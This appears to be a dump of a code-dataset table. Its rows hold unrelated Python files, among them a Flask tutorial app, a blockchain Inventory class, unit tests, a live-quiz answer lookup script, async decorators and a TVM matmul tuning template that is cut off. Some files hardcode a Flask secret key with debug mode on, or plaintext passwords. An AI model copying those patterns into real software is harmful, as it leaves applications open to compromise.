max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
Nelson_Alvarez/Assignments/flask_fund/ninja_turtle/turtle.py | webguru001/Python-Django-Web | 5 | 10800 | <reponame>webguru001/Python-Django-Web<gh_stars>1-10
from flask import Flask
from flask import render_template, redirect, session, request
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def nothing():
return render_template('index.html')
@app.route('/ninja')
def ninja():
x = 'tmnt'
return render_template('ninjas.html', x=x)
@app.route('/ninja/<any>')
def ninjas_colors_any(any):
ninja_dict = {'blue': 'leonardo', 'red': 'raphael', 'purple': 'donatello', 'orange': 'michelangelo'}
if any in ninja_dict:
x = ninja_dict[any]
return render_template('ninjas.html', x=x)
else:
x= 'notapril'
return render_template('ninjas.html', x=x)
app.run(debug=True) | 2.578125 | 3 |
neo/Network/Inventory.py | BSathvik/neo-python | 15 | 10801 | # -*- coding:utf-8 -*-
"""
Description:
Inventory Class
Usage:
from neo.Network.Inventory import Inventory
"""
from neo.IO.MemoryStream import MemoryStream
from neocore.IO.BinaryWriter import BinaryWriter
class Inventory(object):
"""docstring for Inventory"""
def __init__(self):
"""
Create an instance
"""
super(Inventory, self).__init__()
self.hash = None
def GetHashData(self):
"""
Get the hashable data.
Returns:
bytes:
"""
ms = MemoryStream()
w = BinaryWriter(ms)
self.SerializeUnsigned(w)
ms.flush()
return ms.ToArray()
def GetScriptHashesForVerifying(self):
pass
def Serialize(self, writer):
pass
def SerializeUnsigned(self, writer):
pass
def Deserialize(self, reader):
pass
def DeserializeUnsigned(self, reader):
pass
| 2.765625 | 3 |
tests/test_api_gateway/test_common/test_exceptions.py | Clariteia/api_gateway_common | 3 | 10802 | <filename>tests/test_api_gateway/test_common/test_exceptions.py<gh_stars>1-10
"""
Copyright (C) 2021 Clariteia SL
This file is part of minos framework.
Minos framework can not be copied and/or distributed without the express permission of Clariteia SL.
"""
import unittest
from minos.api_gateway.common import (
EmptyMinosModelSequenceException,
MinosAttributeValidationException,
MinosConfigDefaultAlreadySetException,
MinosConfigException,
MinosException,
MinosMalformedAttributeException,
MinosModelAttributeException,
MinosModelException,
MinosParseAttributeException,
MinosRepositoryAggregateNotFoundException,
MinosRepositoryDeletedAggregateException,
MinosRepositoryException,
MinosRepositoryManuallySetAggregateIdException,
MinosRepositoryManuallySetAggregateVersionException,
MinosRepositoryNonProvidedException,
MinosRepositoryUnknownActionException,
MinosReqAttributeException,
MinosTypeAttributeException,
MultiTypeMinosModelSequenceException,
)
class TestExceptions(unittest.TestCase):
def test_type(self):
self.assertTrue(issubclass(MinosException, Exception))
def test_base_repr(self):
exception = MinosException("test")
self.assertEqual("MinosException(message='test')", repr(exception))
def test_base_str(self):
exception = MinosException("test")
self.assertEqual("test", str(exception))
def test_config(self):
self.assertTrue(issubclass(MinosConfigException, MinosException))
def test_config_default_already_set(self):
self.assertTrue(issubclass(MinosConfigDefaultAlreadySetException, MinosConfigException))
def test_repository_aggregate_not_found(self):
self.assertTrue(issubclass(MinosRepositoryAggregateNotFoundException, MinosRepositoryException))
def test_repository_deleted_aggregate(self):
self.assertTrue(issubclass(MinosRepositoryDeletedAggregateException, MinosRepositoryException))
def test_repository_manually_set_aggregate_id(self):
self.assertTrue(issubclass(MinosRepositoryManuallySetAggregateIdException, MinosRepositoryException))
def test_repository_manually_set_aggregate_version(self):
self.assertTrue(issubclass(MinosRepositoryManuallySetAggregateVersionException, MinosRepositoryException,))
def test_repository_bad_action(self):
self.assertTrue(issubclass(MinosRepositoryUnknownActionException, MinosRepositoryException))
def test_repository_non_set(self):
self.assertTrue(issubclass(MinosRepositoryNonProvidedException, MinosRepositoryException))
def test_model(self):
self.assertTrue(issubclass(MinosModelException, MinosException))
def test_model_emtpy_sequence(self):
self.assertTrue(issubclass(EmptyMinosModelSequenceException, MinosModelException))
def test_model_multi_type_sequence(self):
self.assertTrue(issubclass(MultiTypeMinosModelSequenceException, MinosModelException))
def test_model_attribute(self):
self.assertTrue(issubclass(MinosModelAttributeException, MinosException))
def test_required_attribute(self):
self.assertTrue(issubclass(MinosReqAttributeException, MinosModelAttributeException))
def test_type_attribute(self):
self.assertTrue(issubclass(MinosTypeAttributeException, MinosModelAttributeException))
def test_type_attribute_repr(self):
exception = MinosTypeAttributeException("foo", float, True)
message = (
"MinosTypeAttributeException(message=\"The <class 'float'> expected type for 'foo' "
"does not match with the given data type: <class 'bool'>\")"
)
self.assertEqual(message, repr(exception))
def test_malformed_attribute(self):
self.assertTrue(issubclass(MinosMalformedAttributeException, MinosModelAttributeException))
def test_parse_attribute(self):
self.assertTrue(issubclass(MinosParseAttributeException, MinosModelAttributeException))
def test_attribute_parse_repr(self):
exception = MinosParseAttributeException("foo", 34, ValueError())
message = (
'MinosParseAttributeException(message="ValueError() '
"was raised while parsing 'foo' field with 34 value.\")"
)
self.assertEqual(message, repr(exception))
def test_attribute_validation(self):
self.assertTrue(issubclass(MinosAttributeValidationException, MinosModelAttributeException))
def test_attribute_validation_repr(self):
exception = MinosAttributeValidationException("foo", 34)
message = "MinosAttributeValidationException(message=\"34 value does not pass the 'foo' field validation.\")"
self.assertEqual(message, repr(exception))
if __name__ == "__main__":
unittest.main()
| 1.929688 | 2 |
native_prophet.py | 1143048123/cddh | 177 | 10803 | <gh_stars>100-1000
# coding: utf-8
# quote from kmaiya/HQAutomator
# 谷歌搜索部分原版搬运,未做修改
import time
import json
import requests
import webbrowser
questions = []
def get_answer():
resp = requests.get('http://htpmsg.jiecaojingxuan.com/msg/current',timeout=4).text
resp_dict = json.loads(resp)
if resp_dict['msg'] == 'no data':
return 'Waiting for question...'
else:
resp_dict = eval(str(resp))
question = resp_dict['data']['event']['desc']
question = question[question.find('.') + 1:question.find('?')]
if question not in questions:
questions.append(question)
webbrowser.open("https://www.baidu.com/s?ie=UTF-8&wd=" + question)
else:
return 'Waiting for new question...'
def main():
while True:
print(time.strftime('%H:%M:%S',time.localtime(time.time())))
print(get_answer())
time.sleep(1)
if __name__ == '__main__':
main()
| 2.90625 | 3 |
python/ht/nodes/styles/styles.py | Hengle/Houdini-Toolbox | 136 | 10804 | """Classes representing color entries and mappings."""
# =============================================================================
# IMPORTS
# =============================================================================
from __future__ import annotations
# Standard Library
import re
from typing import TYPE_CHECKING, Optional, Tuple
if TYPE_CHECKING:
import hou
# =============================================================================
# CLASSES
# =============================================================================
class StyleConstant:
"""This class represents a named constant style.
:param name: The constant's name.
:param color: The constant's color.
:param color_type: The color type.
:param shape: The constant's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleConstant):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleConstant {} ({})>".format(self.name, self.color)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
# -------------------------------------------------------------------------
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
# -------------------------------------------------------------------------
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
# -------------------------------------------------------------------------
@property
def name(self) -> str:
"""The name the color is mapped to."""
return self._name
# -------------------------------------------------------------------------
@property
def shape(self) -> Optional[str]:
"""The mapped shape."""
return self._shape
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class StyleRule:
"""This class represents a color application bound to a name.
:param name: The rule's name.
:param color: The rule's color.
:param color_type: The rule's color type.
:param shape: The rule's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
file_path: Optional[str] = None,
):
self._color = color
self._color_type = color_type
self._shape = shape
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __ne__(self, other):
if not isinstance(other, StyleRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<StyleRule {} ({})>".format(self.name, self.color)
def __str__(self):
value = self._get_typed_color_value()
components = [re.sub("\\.*0+$", "", "{:0.3f}".format(val)) for val in value]
return "(" + ", ".join(components) + ")"
# -------------------------------------------------------------------------
# NON-PUBLIC METHODS
# -------------------------------------------------------------------------
def _get_typed_color_value(self) -> Tuple[float]:
"""Get the appropriately typed color values.
:return: The color value in the correct type.
"""
to_func = getattr(self.color, self.color_type.lower())
return to_func()
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def color(self) -> hou.Color:
"""The mapped color."""
return self._color
@property
def color_type(self) -> str:
"""The mapped color type."""
return self._color_type
@property
def shape(self) -> Optional[str]:
"""The mapped shape name."""
return self._shape
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
def apply_to_node(self, node: hou.Node):
"""Apply styling to a node.
:param node: Node to apply to
:return:
"""
if self.color is not None:
node.setColor(self.color)
if self.shape is not None:
node.setUserData("nodeshape", self.shape)
class ConstantRule:
"""This class represents a style application bound to a named constant.
:param name: The rule's name.
:param constant_name: The constant name.
:param file_path: The path to the definition file.
:return:
"""
def __init__(self, name: str, constant_name: str, file_path: Optional[str] = None):
self._constant_name = constant_name
self._file_path = file_path
self._name = name
# -------------------------------------------------------------------------
# SPECIAL METHODS
# -------------------------------------------------------------------------
def __eq__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
# For our purposes we only care if the names match.
return self.name == other.name
def __hash__(self):
return hash((self.constant_name, self.name))
def __ne__(self, other):
if not isinstance(other, ConstantRule):
return NotImplemented
return not self.__eq__(other)
def __repr__(self):
return "<ConstantRule {} ({})>".format(self.name, self.constant_name)
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def constant_name(self) -> str:
"""The mapped constant."""
return self._constant_name
@property
def file_path(self) -> Optional[str]:
"""Path the definition was from."""
return self._file_path
@property
def name(self) -> str:
"""The name the style is mapped to."""
return self._name
| 3.4375 | 3 |
src/sntk/kernels/ntk.py | gear/s-ntk | 0 | 10805 | <reponame>gear/s-ntk<gh_stars>0
import math
import numpy as np
# return an array K of size (d_max, d_max, N, N), K[i][j] is kernel value of depth i + 1 with first j layers fixed
def kernel_value_batch(X, d_max):
K = np.zeros((d_max, d_max, X.shape[0], X.shape[0]))
for fix_dep in range(d_max):
S = np.matmul(X, X.T)
H = np.zeros_like(S)
for dep in range(d_max):
if fix_dep <= dep:
H += S
K[dep][fix_dep] = H
L = np.diag(S)
P = np.clip(np.sqrt(np.outer(L, L)), a_min = 1e-9, a_max = None)
Sn = np.clip(S / P, a_min = -1, a_max = 1)
S = (Sn * (math.pi - np.arccos(Sn)) + np.sqrt(1.0 - Sn * Sn)) * P / 2.0 / math.pi
H = H * (math.pi - np.arccos(Sn)) / 2.0 / math.pi
return K
# return an array K of size (N, N), depth d_max, first fix_dep layers fixed
def kernel_value(X, d_max, fix_dep):
K = np.zeros((d_max, X.shape[0], X.shape[0]))
S = np.matmul(X, X.T)
H = np.zeros_like(S)
for dep in range(d_max):
if fix_dep <= dep:
H += S
K[dep] = H
L = np.diag(S)
P = np.clip(np.sqrt(np.outer(L, L)), a_min = 1e-9, a_max = None)
Sn = np.clip(S / P, a_min = -1, a_max = 1)
S = (Sn * (math.pi - np.arccos(Sn)) + np.sqrt(1.0 - Sn * Sn)) * P / 2.0 / math.pi
H = H * (math.pi - np.arccos(Sn)) / 2.0 / math.pi
return K[d_max - 1] | 1.59375 | 2 |
nlpproject/main/words.py | Hrishi2312/IR-reimagined | 0 | 10806 | <filename>nlpproject/main/words.py
import nltk
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, PorterStemmer
from nltk.tokenize import sent_tokenize , word_tokenize
import glob
import re
import os
import numpy as np
import sys
nltk.download('stopwords')
nltk.download('punkt')
Stopwords = set(stopwords.words('english'))
all_words = []
dict_global = {}
file_folder = 'main/documents/*'
idx = 1
files_with_index = {}
def finding_all_unique_words_and_freq(words):
words_unique = []
word_freq = {}
for word in words:
if word not in words_unique:
words_unique.append(word)
for word in words_unique:
word_freq[word] = words.count(word)
return word_freq
def finding_freq_of_word_in_doc(word,words):
freq = words.count(word)
def remove_special_characters(text):
regex = re.compile('[^a-zA-Z0-9\s]')
text_returned = re.sub(regex,'',text)
return text_returned
for file in glob.glob(file_folder):
fname = file
file = open(file , "r")
text = file.read()
text = remove_special_characters(text)
text = re.sub(re.compile('\d'),'',text)
sentences = sent_tokenize(text)
words = word_tokenize(text)
words = [word for word in words if len(words)>1]
words = [word.lower() for word in words]
words = [word for word in words if word not in Stopwords]
dict_global.update(finding_all_unique_words_and_freq(words))
files_with_index[idx] = os.path.basename(fname)
idx = idx + 1
unique_words_all = set(dict_global.keys())
| 3.171875 | 3 |
oseoserver/operations/describeresultaccess.py | pyoseo/oseoserver | 0 | 10807 | # Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the OSEO DescribeResultAccess operation"""
from __future__ import absolute_import
import logging
import datetime as dt
from django.core.exceptions import ObjectDoesNotExist
import pytz
import pyxb
import pyxb.bundles.opengis.oseo_1_0 as oseo
from .. import errors
from .. import models
from ..models import Order
from .. import utilities
logger = logging.getLogger(__name__)
def describe_result_access(request, user):
"""Implements the OSEO DescribeResultAccess operation.
This operation returns the location of the order items that are
ready to be downloaded by the user.
The DescribeResultAccess operation only reports on the availability
of order items that specify onlineDataAccess as their delivery option.
Parameters
----------
request: oseo.DescribeResultAccess
The incoming request
user: django.contrib.auth.User
The django user that placed the request
Returns
-------
response: oseo.SubmitAck
The response SubmitAck instance
"""
try:
order = Order.objects.get(id=request.orderId)
except ObjectDoesNotExist:
raise errors.InvalidOrderIdentifierError()
if order.user != user:
raise errors.AuthorizationFailedError
completed_items = get_order_completed_items(order, request.subFunction)
logger.debug("completed_items: {}".format(completed_items))
order.last_describe_result_access_request = dt.datetime.now(pytz.utc)
order.save()
response = oseo.DescribeResultAccessResponse(status='success')
item_id = None
for item in completed_items:
iut = oseo.ItemURLType()
iut.itemId = item_id or item.item_specification.item_id
iut.productId = oseo.ProductIdType(
identifier=item.identifier,
)
iut.productId.collectionId = utilities.get_collection_identifier(
item.item_specification.collection)
iut.itemAddress = oseo.OnLineAccessAddressType()
iut.itemAddress.ResourceAddress = pyxb.BIND()
iut.itemAddress.ResourceAddress.URL = item.url
iut.expirationDate = item.expires_on
response.URLs.append(iut)
return response
def get_order_completed_items(order, behaviour):
"""Get the completed order items for product orders.
Parameters
----------
order: oseoserver.models.Order
The order for which completed items are to be returned
behaviour: str
Either 'allReady' or 'nextReady', as defined in the OSEO
specification
Returns
--------
list
The completed order items for this order
"""
batches = order.batches.all()
all_complete = []
for batch in batches:
complete_items = get_batch_completed_items(batch, behaviour)
all_complete.extend(complete_items)
return all_complete
def get_batch_completed_items(batch, behaviour):
last_time = batch.order.last_describe_result_access_request
list_all_items = last_time is None or behaviour == batch.ALL_READY
order_delivery = batch.order.selected_delivery_option.delivery_type
batch_complete_items = []
queryset = batch.order_items.filter(
status=batch.order.COMPLETED
).order_by("item_specification__id")
for item in queryset:
item_spec = item.item_specification
try:
delivery = (
item_spec.selected_delivery_option.delivery_type)
except models.ItemSpecificationDeliveryOption.DoesNotExist:
delivery = order_delivery
if delivery != models.BaseDeliveryOption.ONLINE_DATA_ACCESS:
# describeResultAccess only applies to items that specify
# 'onlinedataaccess' as delivery type
logger.debug(
"item {} does not specify onlinedataaccess as its "
"delivery type, skipping item...".format(item)
)
continue
completed_since_last = (item.completed_on is None or
last_time is None or
item.completed_on >= last_time)
list_this_item = (
behaviour == batch.NEXT_READY and completed_since_last)
if list_all_items or list_this_item:
batch_complete_items.append(item)
return batch_complete_items
| 2.21875 | 2 |
utils/decorator/dasyncio.py | masonsxu/red-flask | 0 | 10808 | <reponame>masonsxu/red-flask
# -*- coding: utf-8 -*-
# 基于python Threading模块封装的异步函数装饰器
import time
from functools import wraps
from threading import Thread
def async_call(fn):
"""一次简单的异步处理操作,装饰在要异步执行的函数前,再调用该函数即可执行单次异步操作(开辟一条新的线程)
Args:
:fn(function):需要异步处理的方法
Return:
:wrapper(function):
"""
@wraps(fn) # 解决被装饰的函数的名字会变成装饰器函数,并还原函数名称
def wrapper(*args, **kwargs):
Thread(target=fn, args=args, kwargs=kwargs).start()
return wrapper
def async_pool(pool_links):
"""可定义链接数的线程池装饰器,可用于并发执行多次任务
Args:
:pool_links(int):进程的数量
Returns:
:sub_wrapper(function):对象装饰器
"""
def sub_wrapper(func):
@wraps(func)
def wrapper(*args, **kwargs):
for _ in range(0, pool_links):
Thread(target=func, args=args, kwargs=kwargs).start()
# func(*args, **kwargs)
return wrapper
return sub_wrapper
def async_retry(retry_times, space_time):
"""自动重试类装饰器,不支持单独异步,但可嵌套于 call 和 pool中使用
Args:
:retry_times(int):重试次数
"""
def sub_wrapper(func):
@wraps(func)
def wrapper(*args, **kwargs):
try_times = retry_times
while try_times > 0:
try:
func(*args, **kwargs)
break
except Exception as e:
print(e)
time.sleep(space_time)
try_times = try_times - 1
return wrapper
return sub_wrapper
# 以下为测试案例代码
# @async_call
# def sleep2andprint():
# time.sleep(2)
# print('22222222')
# @async_pool(pool_links=5)
# def pools():
# time.sleep(1)
# print('hehe')
# @async_retry(retry_times=3, space_time=1)
# def check():
# a = 1
# b = '2'
# print(a + b)
# def check_all():
# print('正在测试async_call组件')
# print('111111')
# sleep2andprint()
# print('333333')
# print('若3333出现在22222此前,异步成功')
# print('正在测试async_pool组件')
# pools()
# print('在一秒内打印出5个hehe为成功')
# print('正在测试async_retry组件')
# check()
# print('打印三次异常则成功')
# print(check.__name__)
# print(sleep2andprint.__name__)
# print(pools.__name__)
# check_all()
| 3.0625 | 3 |
oo/pessoa.py | wfs18/pythonbirds | 0 | 10809 | class Person:
olhos = 2
def __init__(self, *children, name=None, year=0):
self.year = year
self.name = name
self.children = list(children)
def cumprimentar(self):
return 'Hello'
@staticmethod
def metodo_estatico():
return 123
@classmethod
def metodo_classe(cls):
return f'{cls} - {cls.olhos}'
if __name__ == '__main__':
p = Person()
eu = Person(name='marcio')
wes = Person(eu, name='Wesley')
print(p.cumprimentar())
print(p.year) # Atributo de instancia
print(p.name) # Atributo de dados
for filhos in wes.children:
print(filhos.year)
p.sobre = 'eu'
print(p.sobre)
del p.sobre
print(p.__dict__)
print(p.olhos)
print(eu.olhos)
print(p.metodo_estatico(), eu.metodo_estatico())
print(p.metodo_classe(), eu.metodo_classe())
| 3.828125 | 4 |
tests/integration/test_combined.py | jonathan-winn-geo/new-repo-example | 0 | 10810 | """Test combined function."""
from cmatools.combine.combine import combined
def test_combined():
"""Test of combined function"""
assert combined() == "this hello cma"
| 1.914063 | 2 |
elastalert_modules/top_count_keys_enhancement.py | OpenCoreCH/elastalert | 0 | 10811 | """Enhancement to reformat `top_events_X`
from match in order to reformat and put it
back to be able to use in alert message.
New format:
top_events_keys_XXX -- contains array of corresponding key values defined in `top_count_keys`,
where `XXX` key from `top_count_keys` array.
top_events_values_XXX -- contains array of corresponding counts.
Example:
Original:
{"top_events_KEY.NAME":{"key_value1": 10, "key_value2": 20}}
Reformatted:
{
"top_events_keys_KEY.NAME":["key_value1", "key_value2"]
"top_events_values_KEY.NAME":[10, 20]
}
Can be used in the rule like:
top_count_keys:
- 'KEY.NAME'
match_enhancements:
- 'elastalert_modules.top_count_keys_enhancement.Enhancement'
alert_text_args:
- top_events_keys_KEY.NAME[0]
"""
from elastalert.enhancements import BaseEnhancement
class Enhancement(BaseEnhancement):
def process(self, match):
top_count_keys = self.rule['top_count_keys']
if top_count_keys:
for k in top_count_keys:
key = "top_events_%s" % k
if match[key]:
filtered = {key: value for (key, value) in match[key].items() if key}
match["top_events_keys_%s" % k] = list(filtered.keys())
match["top_events_values_%s" % k] = list(filtered.values())
| 2.921875 | 3 |
nets.py | koreyou/SWEM-chainer | 0 | 10812 | <reponame>koreyou/SWEM-chainer<gh_stars>0
import numpy
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import reporter
embed_init = chainer.initializers.Uniform(.25)
def block_embed(embed, x, dropout=0.):
"""Embedding function followed by convolution
Args:
embed (callable): A :func:`~chainer.functions.embed_id` function
or :class:`~chainer.links.EmbedID` link.
x (:class:`~chainer.Variable` or :class:`numpy.ndarray` or \
:class:`cupy.ndarray`): Input variable, which
is a :math:`(B, L)`-shaped int array. Its first dimension
:math:`(B)` is assumed to be the *minibatch dimension*.
The second dimension :math:`(L)` is the length of padded
sentences.
dropout (float): Dropout ratio.
Returns:
~chainer.Variable: Output variable. A float array with shape
of :math:`(B, N, L, 1)`. :math:`(N)` is the number of dimensions
of word embedding.
"""
e = embed(x)
e = F.dropout(e, ratio=dropout)
e = F.transpose(e, (0, 2, 1))
e = e[:, :, :, None]
return e
class SWEMBase(chainer.Chain):
"""The base class for SWEM (Simple Word-Embedding-based Models)
This model embed tokens to word embedding, encode embedding to
with pooling (which needs to be implemented in derived classes)
and applies two layer MLP.
Args:
n_class (int): The number of classes to be predicted.
n_vocab (int): The size of vocabulary.
emb_size (int): The number of units word embedding.
n_units (int): The number of units of MLP.
dropout (float): The dropout ratio.
"""
def __init__(self, n_class, n_vocab, emb_size, n_units,
dropout=0.2, initial_emb=None):
super(SWEMBase, self).__init__()
if initial_emb is None:
initial_emb = embed_init
with self.init_scope():
self.embed = L.EmbedID(
n_vocab, emb_size, ignore_label=-1, initialW=initial_emb)
self.l1 = L.Linear(None, n_units)
self.l2 = L.Linear(n_units, n_class)
self.dropout = dropout
def forward(self, xs):
return self.predict(xs)
def predict(self, xs, softmax=False, argmax=False):
x_block = chainer.dataset.convert.concat_examples(xs, padding=-1)
ex_block = block_embed(self.embed, x_block, self.dropout)
x_len = [len(x) for x in xs]
z = self.encode(ex_block, x_len)
h = F.relu(self.l1(F.dropout(z, self.dropout)))
logits = self.l2(F.dropout(h, self.dropout))
if softmax:
return F.softmax(logits).array
elif argmax:
return self.xp.argmax(logits.array, axis=1)
else:
return logits
def encode(self, ex_block, x_len):
raise NotImplementedError()
class SWEMhier(SWEMBase):
"""Hierarchical variation of SWEM (SWEM-hier)
Args:
n_class (int): The number of classes to be predicted.
n_vocab (int): The size of vocabulary.
emb_size (int): The number of units word embedding.
n_units (int): The number of units of MLP.
dropout (float): The dropout ratio.
"""
def __init__(self, n_class, n_vocab, emb_size, n_units,
dropout=0.2, initial_emb=None, window=5):
super(SWEMhier, self).__init__(
n_class, n_vocab, emb_size, n_units, dropout=dropout,
initial_emb=initial_emb)
self.window = window
def encode(self, ex_block, x_len):
if ex_block.shape[2] > self.window:
# no need for pooling when length is smaller than the window
ex_block = F.average_pooling_2d(ex_block, [self.window, 1], stride=1)
return F.max(F.squeeze(ex_block, -1), axis=2)
class SWEMconcat(SWEMBase):
def encode(self, ex_block, x_len):
emb_ave = F.sum(F.squeeze(ex_block, -1), axis=2) / self.xp.array(x_len)[:, None]
emb_max = F.max(F.squeeze(ex_block, -1), axis=2)
return F.concat((emb_max, emb_ave), axis=1)
| 2.78125 | 3 |
src/entities/users.py | MillaKelhu/ohtu-lukuvinkkikirjasto | 0 | 10813 | from flask_login import UserMixin
class Users(UserMixin):
# Luodaan näennäinen tietokanta käyttäjistä
user_database = {"kayttaja": ("kayttaja", "salasana"),
"tunnus": ("tunnus", "passu")}
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def get_username(self):
return self.username
@classmethod
def get_password(cls, username):
username, password = cls.user_database.get(username)
return password
@classmethod
def get_username(cls, username):
username, password = cls.user_database.get(username)
return username
def is_active(self):
return True
def get_id(self):
return self.id
def roles(self):
return ["ADMIN", "USER"]
@classmethod
def get(cls, id):
return cls.user_database.get(id)
| 2.84375 | 3 |
artifacts/kernel_db/autotvm_scripts/tune_tilling_dense_select_codegen.py | LittleQili/nnfusion | 0 | 10814 | """
matmul autotvm
[batch,in_dim] x [in_dim,out_dim]
search_matmul_config(batch,in_dim,out_dim,num_trials):
input: batch,in_dim,out_dim,num_trials
[batch,in_dim] x [in_dim,out_dim]
num_trials: num of trials, default: 1000
output: log (json format)
use autotvm to search configs for the matmul
lookup_matmul_config():
find a proper matmul config
note: trade off kernel's performance and grid & block size
launch_matmul_from_config(config):
input: config (json string)
usage:
1. use search_matmul_config(batch,in_dim,out_dim,num_trials) to search configs
2. use lookup_matmul_config() to get a proper config
3. write the config (in json format) to "matmul_config.json"
4. use launch_matmul_from_config("matmul_config.json") to print the matmul kernel code
"""
import numpy as np
import tvm
import logging
import sys
from tvm import autotvm
import topi
import json
import os
from topi.util import get_const_tuple
import tensorflow as tf
flags = tf.flags
flags.DEFINE_string("input_path", "", "path of input file")
flags.DEFINE_string("autotvm_log", "../autotvm_logs/all_tuned_tilling_dense_nn.1000.log", "path of autotvm tuning log")
flags.DEFINE_string("tvm_profile_log",
"/tmp/tvm_profile.log", "path of tvm profile")
flags.DEFINE_string("output_path", "", "path of output file")
FLAGS = flags.FLAGS
@autotvm.template
def tvm_matmul_tune_op(batch, in_dim, out_dim):
"""
autotvm tuning template
D=A*B
[batch, in_dim] x [in_dim, out_dim]
"""
A = tvm.placeholder((batch, in_dim), name='A', dtype="float32")
B = tvm.placeholder((in_dim, out_dim), name='B', dtype="float32")
k = tvm.reduce_axis((0, in_dim), name='k')
C = tvm.compute((batch, out_dim), lambda i, j: tvm.sum(
A[i, k] * B[k, j], axis=k), name='C')
cfg = autotvm.get_config()
s = tvm.create_schedule(C.op)
AA = s.cache_read(A, "shared", [C])
AL = s.cache_read(AA, "local", [C])
BB = s.cache_read(B, "shared", [C])
BL = s.cache_read(BB, "local", [C])
CC = s.cache_write(C, "local")
y, x = C.op.axis
k = CC.op.reduce_axis[0]
cfg.define_split('tile_k', cfg.axis(k), num_outputs=3)
ko, kt, ki = cfg['tile_k'].apply(s, CC, k)
block_x = tvm.thread_axis('blockIdx.x')
block_y = tvm.thread_axis('blockIdx.y')
thread_x = tvm.thread_axis('threadIdx.x')
thread_y = tvm.thread_axis('threadIdx.y')
cfg.define_split('tile_y', cfg.axis(y), num_outputs=4)
cfg.define_split('tile_x', cfg.axis(x), num_outputs=4)
by, tyz, ty, yi = cfg['tile_y'].apply(s, C, y)
bx, txz, tx, xi = cfg['tile_x'].apply(s, C, x)
s[C].bind(by, block_y)
s[C].bind(bx, block_x)
s[C].bind(tyz, tvm.thread_axis('vthread'))
s[C].bind(txz, tvm.thread_axis('vthread'))
s[C].bind(ty, thread_y)
s[C].bind(tx, thread_x)
s[C].reorder(by, bx, tyz, txz, ty, tx, yi, xi)
s[CC].compute_at(s[C], tx)
yo, xo = CC.op.axis
s[CC].reorder(ko, kt, yo, xo, ki)
s[CC].unroll(kt)
for stage in [AL, BL]:
s[stage].compute_at(s[CC], kt)
s[stage].double_buffer()
for stage in [AA, BB]:
s[stage].compute_at(s[CC], ko)
fused = s[stage].fuse(*s[stage].op.axis)
ty, tx = s[stage].split(fused, nparts=cfg['tile_y'].size[2])
tx, xi = s[stage].split(tx, nparts=cfg['tile_x'].size[2])
_, xi = s[stage].split(xi, factor=4)
s[stage].bind(ty, thread_y)
s[stage].bind(tx, thread_x)
s[stage].vectorize(xi)
s[stage].double_buffer()
cfg.define_knob('auto_unroll_max_step', [512, 1500])
s[C].pragma(by, 'auto_unroll_max_step', cfg['auto_unroll_max_step'].val)
s[C].pragma(by, 'unroll_explicit', False)
cfg.add_flop(batch * in_dim * out_dim * 2)
return s, [A, B, C]
def search_matmul_config(batch, in_dim, out_dim, num_trials):
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
task = autotvm.task.create(tvm_matmul_tune_op, args=(
batch, in_dim, out_dim), target='cuda')
print(task.config_space)
measure_option = autotvm.measure_option(
builder=autotvm.LocalBuilder(),
runner=autotvm.LocalRunner(repeat=3, min_repeat_ms=100, timeout=4)
)
op_name = "tuned_dot_op_float_%d_%d_%d" % (batch, in_dim, out_dim)
log_name = "tuned_kernels/" + op_name + ".log"
tuner = autotvm.tuner.XGBTuner(task)
tuner.tune(n_trial=num_trials, measure_option=measure_option,
callbacks=[autotvm.callback.log_to_file(log_name)])
dispatch_context = autotvm.apply_history_best(log_name)
best_config = dispatch_context.query(task.target, task.workload)
print('\nBest config:')
print(best_config)
with dispatch_context:
with tvm.target.create('cuda'):
